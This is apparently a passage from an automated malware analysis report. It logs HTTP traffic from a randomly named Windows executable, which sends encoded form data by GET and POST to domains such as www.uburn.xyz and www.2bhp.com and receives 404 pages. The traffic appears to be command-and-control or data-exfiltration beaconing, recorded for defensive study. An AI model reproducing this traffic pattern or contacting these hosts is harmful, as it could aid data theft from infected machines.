                                                      Data Ascii: 00yp=IJM1DHDU+xE4Hs6vUpJJ9C6Ai2dWAf5iTDZ3i9lspMv/oLeuErBLivl0dqsOiKfEJnA8h3nZHuM0OPHIOZ/SDPlpTnRIMUmzvFPSgVEat1wPfPamRKXduKf4x8QWy3RorfIdyNgzNMewIUrK0dTV9Oo5t6Sq7ld8thUSGP+P/o5nOV3GailcJEATcXZiHtfU1YH53VRvbliJ18RZlyaEx0FqNIISos3UbCIKL1IociMRElL0c0Lc/TaM5FynVDbjUmGRTOD/ij/pbKoaPgwcc6OBJ0d2mU4I2ct9PXMYhPHYpxanONPjxFVx4eCquaw+PUC2zvMUsgMjN77ZDd/8G+/rWUhfOw3wuvhLzuU+tJ86CL8Sqq4vmRATkqE06If1uLiJq9cR1U7SpwRa7Uc/I9bi9PaRGbv05j6YKKw5X+H8z4wT3vtQaCM5F2Mq2X5HKNAQ56ZoIqPa+ttpmqH4cmNdIQFQNlYf712uaUDAx4GubQWjbtfOBdZrXu1PAOIQx02SRzmX56C0ezJikr8cOLPq8MSTqH5cPOXh83YjKTJ42UtXVw5nhRLOX49QD9aUMQZRIrV3Is268TnaYEI53kgbZDv5OxNQGAmY6VHYYHdUdQql1Q+ZbaN0vuOUHO3Z2d85JMVmgPFmP0dY6VfB7C6y5CaEBf7EJGVF2e592ex0lSmXs4GxlN/iz7KhZIJffnHleBDRvz9oH7wJHsb5G7DxmeHeM4Qgo6XXyemLkvZTrggnbuS+um/6oJ8Gg9NPQ9vvdI03xxNAhgbYu+npE825NOZf6MqtMiCbszu+waFXu9hwqnLwlhQgBz8zRMX6Y2BzknYmiKP8jDaTIt6zthp/BjIr9pQEF1K9dJv1a1ZNwbreXYnIWdcFBxH9+ujYcMUKOTC512Fo7jCQXgJVo0sPWwizmrZ1oMfWiuQrvJu0HG5488xv95sJG8SslMvpv+bvXUIj5fcO0OyUk8d3WT9VVYdtstiBuq9AT4KNLWrK+OL [TRUNCATED]
                                                      Sep 19, 2024 15:04:42.799539089 CEST1680OUTData Raw: 6e 31 49 31 79 52 64 57 7a 67 32 73 72 43 76 2f 50 6d 32 77 43 6d 71 76 62 45 2f 43 6f 4e 4c 37 6f 57 47 36 58 58 4f 78 78 2f 59 50 41 39 78 52 6f 37 6c 4c 45 53 2f 42 56 4f 55 32 35 45 2f 6f 7a 2b 37 61 5a 76 4a 2b 58 74 51 66 41 39 65 48 50 61
                                                      Data Ascii: n1I1yRdWzg2srCv/Pm2wCmqvbE/CoNL7oWG6XXOxx/YPA9xRo7lLES/BVOU25E/oz+7aZvJ+XtQfA9eHPaZLuSbPTiYEa0kzBFZHqigZxoGzoUYzXUJWPYx/R0ycvMGSpQv/TKslDhM6rdTBfCngZ7rsLQcB3O+uBPQoakw0UcUdzcdRlC4zl74aLz1jXUN+Y9x2qdHLLGPVdCcj/H8+dz6LsOuSJwjAYgjyiyiEtHS5lniYhYt
                                                      Sep 19, 2024 15:04:43.464031935 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:43 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.224917081.88.63.46802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:45.326869011 CEST469OUTGET /znmp/?00yp=FLkVAxn7xj4ld/LvMq0K/iiXulx9N79aE0AH2N1ZkKvu5bquFbdTzPdTC48MhLLFLmYJ1R3iNuIMDMPSAaDXGLZVeUFEAGqcz1H7kSUUuWNlK+WvQ97ihpKrgIN8&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.2bhp.com
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:04:45.984172106 CEST367INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:45 GMT
                                                      Server: Apache
                                                      Content-Length: 203
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.224917167.223.117.189802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:51.065371037 CEST2472OUTPOST /unks/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.uburn.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.uburn.xyz
                                                      Referer: http://www.uburn.xyz/unks/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 63 6b 38 4b 4f 36 78 74 51 67 6a 67 32 64 70 50 33 6c 46 61 57 61 47 6d 49 7a 68 73 4f 4a 63 62 4c 70 4b 43 41 42 55 71 50 4f 78 30 6b 56 61 67 2b 6b 57 55 79 67 59 4a 68 38 76 4d 79 38 4e 31 79 77 7a 78 30 4d 42 2f 63 57 79 76 4a 39 51 4c 32 50 57 41 4e 2f 54 30 70 41 4d 32 30 49 41 6c 65 37 34 62 36 58 61 55 4c 51 72 67 63 44 33 48 57 56 34 49 4c 46 75 51 38 7a 38 6b 52 70 47 32 68 34 4e 4a 37 56 62 59 44 79 67 39 56 6b 43 71 48 6b 47 6b 68 38 44 79 74 58 4c 6a 73 63 71 44 36 6e 52 73 69 37 58 38 2f 6e 57 6c 49 66 57 4e 59 43 78 4e 4e 45 37 70 32 37 32 4f 5a 68 36 55 6b 6b 79 67 76 33 73 4f 69 6f 69 79 70 37 4a 63 4b 31 2b 64 46 48 42 7a 37 38 68 6e 72 35 30 30 58 78 39 56 62 38 57 4a 73 47 50 42 71 54 34 78 73 4b 56 74 4f 6b 63 7a 4f 56 59 65 46 39 64 47 6f 6d 69 50 35 64 48 38 6f 34 75 56 38 36 6c 6c 43 6e 47 53 5a 33 33 4a 37 2b 75 70 70 49 67 61 43 6a 6d 51 33 49 65 78 35 7a 76 71 78 76 49 6d 76 51 49 46 4b 69 43 58 6c 6f 7a 36 37 67 66 4b 7a [TRUNCATED]
                                                      Data Ascii: 00yp=RfJp1+tCLcajck8KO6xtQgjg2dpP3lFaWaGmIzhsOJcbLpKCABUqPOx0kVag+kWUygYJh8vMy8N1ywzx0MB/cWyvJ9QL2PWAN/T0pAM20IAle74b6XaULQrgcD3HWV4ILFuQ8z8kRpG2h4NJ7VbYDyg9VkCqHkGkh8DytXLjscqD6nRsi7X8/nWlIfWNYCxNNE7p272OZh6Ukkygv3sOioiyp7JcK1+dFHBz78hnr500Xx9Vb8WJsGPBqT4xsKVtOkczOVYeF9dGomiP5dH8o4uV86llCnGSZ33J7+uppIgaCjmQ3Iex5zvqxvImvQIFKiCXloz67gfKzcUwEfjIYSvKuTv3awV9Mulfd926dORUY8n3cirKNQsxug5t8lRkleYK2MWy6TYOJb2CRJSo9tBryCTE6RRl2DOZ1T7i8qBpsnGZ4jkOXt3CREeFgWg3O7GE90GmXYhClI8gtFtyercyTzkPedZujH9mCFztrMabdDjpmwMq8S+ObBsPelSPPWNlepG/7ExYsPAZqBnfSvJdAAdSF6vXcD+MXV4rcSZuLk8HRIdziKq8JRUCKvmXDMqfRp6dZec7jPFU9yQn2iHDLv+tY6SZiBlCLVqK20wbgeY9Fr5rs5fbpRkD/kAoFosF2eO7nuuDNJ7VejhwlsVqVCkiEEEScvpXTAdIXwwNXCJyDTDDAcfwC9Hk6G5lQRF4w93vTJeIJ9i29jV2OwvAVqhQ+eY21U3Gm+9p05SjX5wqTvqALBZ1rfgozFG0Qw+mWkN/UeTnRfqSj57p4/Lu8GsZi4DMjSO09MvmQUQ4tcNK7/mh+Cg6Dg5+Z4n08shxynK4wUe3bYLOkjybW0eimDlU79F8zDswlRQ4wUXoik9gzv449SLdKTsHUQQEpyu6dIaSRaMYDHNnzWaSgSKEwySWpJezS5MPBzQ5fi3+mugs/gVswu+nTHnkPkunCQnxhH0qEXUKlANRblo7SxdEdIH2oRr95H7WU5xqOpJjG5D [TRUNCATED]
                                                      Sep 19, 2024 15:04:51.070358992 CEST219OUTData Raw: 77 34 77 54 59 67 66 54 64 76 72 2b 69 52 64 51 38 50 2f 57 4d 68 61 4b 2b 53 6f 6a 70 59 56 50 58 32 33 71 4c 31 6c 77 64 64 4d 71 35 44 58 50 46 75 4d 47 73 79 57 52 51 72 44 48 56 48 5a 4e 43 49 56 7a 4d 43 4e 31 52 6b 57 6c 4d 66 56 53 6f 70
                                                      Data Ascii: w4wTYgfTdvr+iRdQ8P/WMhaK+SojpYVPX23qL1lwddMq5DXPFuMGsyWRQrDHVHZNCIVzMCN1RkWlMfVSopTqLwIHfuj85kt+qjD65qPSbzPOwxSgOVenr6T6JfA4vOP6BxxuQlAEETTxdrf8wawwHpe9UB9xCfL1rKKNdxglKykJLYX7tZd5qT2VzZ0yttg/igiGUmn2wvHa14/WnxQiq/5oi9S
                                                      Sep 19, 2024 15:04:51.829113960 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:51 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 32106
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 19, 2024 15:04:51.829188108 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                      Sep 19, 2024 15:04:51.829200029 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                      Sep 19, 2024 15:04:51.829210043 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                      Sep 19, 2024 15:04:51.829220057 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                      Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                      Sep 19, 2024 15:04:51.829231024 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                      Sep 19, 2024 15:04:51.829240084 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                      Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                      Sep 19, 2024 15:04:51.829250097 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                                      Sep 19, 2024 15:04:51.829257011 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li>
                                                      Sep 19, 2024 15:04:51.829664946 CEST1236INData Raw: 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 54 72 61 6e 73 70 61 72 65 6e 74
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-transparent.html">Header 4 Transparent</a></li> <li><a class="dropdown-item" href="header4-light.html">Header 4 Light</a></li>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.224917267.223.117.189802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:53.598743916 CEST730OUTPOST /unks/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.uburn.xyz
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.uburn.xyz
                                                      Referer: http://www.uburn.xyz/unks/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 63 6e 6b 4b 50 72 78 74 52 41 6a 67 37 39 70 50 2b 46 45 52 57 61 4c 47 49 33 77 70 4f 62 38 62 4c 39 4f 43 42 30 34 71 4d 4f 78 33 38 6c 61 6b 6a 30 57 64 79 67 59 7a 68 2b 37 4d 79 38 5a 31 30 53 37 78 32 4e 42 38 52 47 79 74 41 64 51 47 32 50 61 7a 4e 2f 66 65 70 42 6f 32 30 4f 34 6c 64 2f 59 62 2f 78 75 55 4f 67 72 6d 65 44 33 71 57 55 45 64 4c 46 2b 59 38 77 34 6b 52 61 43 32 69 70 74 4a 2f 45 62 59 52 79 67 67 59 45 44 34 41 47 54 50 67 4b 62 2f 6e 47 36 48 71 2b 53 54 6e 51 68 58 6b 62 48 78 38 6d 6d 57 4e 6f 2f 70 4f 68 5a 49 50 67 3d 3d
                                                      Data Ascii: 00yp=RfJp1+tCLcajcnkKPrxtRAjg79pP+FERWaLGI3wpOb8bL9OCB04qMOx38lakj0WdygYzh+7My8Z10S7x2NB8RGytAdQG2PazN/fepBo20O4ld/Yb/xuUOgrmeD3qWUEdLF+Y8w4kRaC2iptJ/EbYRyggYED4AGTPgKb/nG6Hq+STnQhXkbHx8mmWNo/pOhZIPg==
                                                      Sep 19, 2024 15:04:54.177670956 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Thu, 19 Sep 2024 13:04:54 GMT
                                                      Server: Apache
                                                      X-Frame-Options: SAMEORIGIN
                                                      Content-Length: 32106
                                                      X-XSS-Protection: 1; mode=block
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 19, 2024 15:04:54.177726984 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                      Sep 19, 2024 15:04:54.177774906 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                      Sep 19, 2024 15:04:54.177815914 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                      Sep 19, 2024 15:04:54.177854061 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                      Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                      Sep 19, 2024 15:04:54.177889109 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                      Sep 19, 2024 15:04:54.177925110 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                      Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                      Sep 19, 2024 15:04:54.177954912 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
